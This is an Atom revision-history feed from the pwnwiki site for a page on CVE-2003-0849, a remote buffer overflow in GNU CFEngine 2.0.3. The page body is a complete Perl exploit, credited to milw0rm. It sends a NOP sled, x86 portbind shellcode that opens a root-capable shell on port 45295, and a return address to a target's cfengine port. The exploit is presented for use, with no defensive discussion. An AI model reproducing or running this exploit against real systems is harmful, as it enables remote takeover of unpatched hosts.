<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2003-0849_GNU_CFEngine_2.-2.0.3_%E9%81%A0%E7%A8%8B%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2003-0849 GNU CFEngine 2.-2.0.3 遠程緩衝區溢出漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2003-0849_GNU_CFEngine_2.-2.0.3_%E9%81%A0%E7%A8%8B%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2003-0849_GNU_CFEngine_2.-2.0.3_%E9%81%A0%E7%A8%8B%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T02:16:04Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2003-0849_GNU_CFEngine_2.-2.0.3_%E9%81%A0%E7%A8%8B%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=2073&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; #!/usr/bin/perl -s # kokaninATdtors.net / cfengine2-2.0.3 from freebsd ports 26/sep/2003. # forking portbind shellcode port=0xb0ef(45295) by eSDee # bug discover...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2003-0849_GNU_CFEngine_2.-2.0.3_%E9%81%A0%E7%A8%8B%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=2073&amp;oldid=prev"/>
		<updated>2021-05-03T12:40:21Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; #!/usr/bin/perl -s # kokaninATdtors.net / cfengine2-2.0.3 from freebsd ports 26/sep/2003. # forking portbind shellcode port=0xb0ef(45295) by eSDee # bug discover...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/perl -s&lt;br /&gt;
# kokaninATdtors.net / cfengine2-2.0.3 from freebsd ports 26/sep/2003.&lt;br /&gt;
# forking portbind shellcode port=0xb0ef(45295) by eSDee&lt;br /&gt;
# bug discovered by nick cleaton, tested on FreeBSD 4.8-RELEASE&lt;br /&gt;
&lt;br /&gt;
use IO::Socket;&lt;br /&gt;
if(!$ARGV[1])&lt;br /&gt;
{ print &amp;quot;usage: ./DSR-cfengine.pl &amp;lt;host&amp;gt; &amp;lt;port&amp;gt; (default cfengine is 5308)\n&amp;quot;; exit(-1); }&lt;br /&gt;
&lt;br /&gt;
$host = $ARGV[0];&lt;br /&gt;
$port = $ARGV[1];&lt;br /&gt;
$nop = &amp;quot;\x90&amp;quot;;&lt;br /&gt;
$ret = pack(&amp;quot;l&amp;quot;,0xbfafe3dc);&lt;br /&gt;
$shellcode = &lt;br /&gt;
&amp;quot;\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0&amp;quot;.&lt;br /&gt;
&amp;quot;\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02&amp;quot;.&lt;br /&gt;
&amp;quot;\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80&amp;quot;.&lt;br /&gt;
&amp;quot;\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x50\x57&amp;quot;.&lt;br /&gt;
&amp;quot;\x50\xb0\x6a\xcd\x80\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53\x89&amp;quot;.&lt;br /&gt;
&amp;quot;\xe2\x50\x51\x52\xb3\x14\x53\x50\xb0\x2e\xcd\x80\x31\xc0\x50\x50&amp;quot;.&lt;br /&gt;
&amp;quot;\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80&amp;quot;.&lt;br /&gt;
&amp;quot;\x39\xc3\x75\x44\x31\xc0\x57\x50\xb0\x06\xcd\x80\x31\xc0\x50\x56&amp;quot;.&lt;br /&gt;
&amp;quot;\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd&amp;quot;.&lt;br /&gt;
&amp;quot;\x80\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x2f&amp;quot;.&lt;br /&gt;
&amp;quot;\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b&amp;quot;.&lt;br /&gt;
&amp;quot;\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80&amp;quot;.&lt;br /&gt;
&amp;quot;\xeb\x9a&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
$buf = $nop x 2222 . $shellcode . $ret x 500;&lt;br /&gt;
&lt;br /&gt;
$socket = new IO::Socket::INET ( &lt;br /&gt;
Proto  =&amp;gt; &amp;quot;tcp&amp;quot;,&lt;br /&gt;
PeerAddr =&amp;gt; $host,&lt;br /&gt;
PeerPort =&amp;gt; $port, &lt;br /&gt;
);&lt;br /&gt;
&lt;br /&gt;
die &amp;quot;unable to connect to $host:$port ($!)\n&amp;quot; unless $socket;&lt;br /&gt;
&lt;br /&gt;
sleep(1); #you might have to adjust this on slow connections&lt;br /&gt;
print $socket $buf;&lt;br /&gt;
&lt;br /&gt;
close($socket);&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# milw0rm.com [2003-09-27]&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>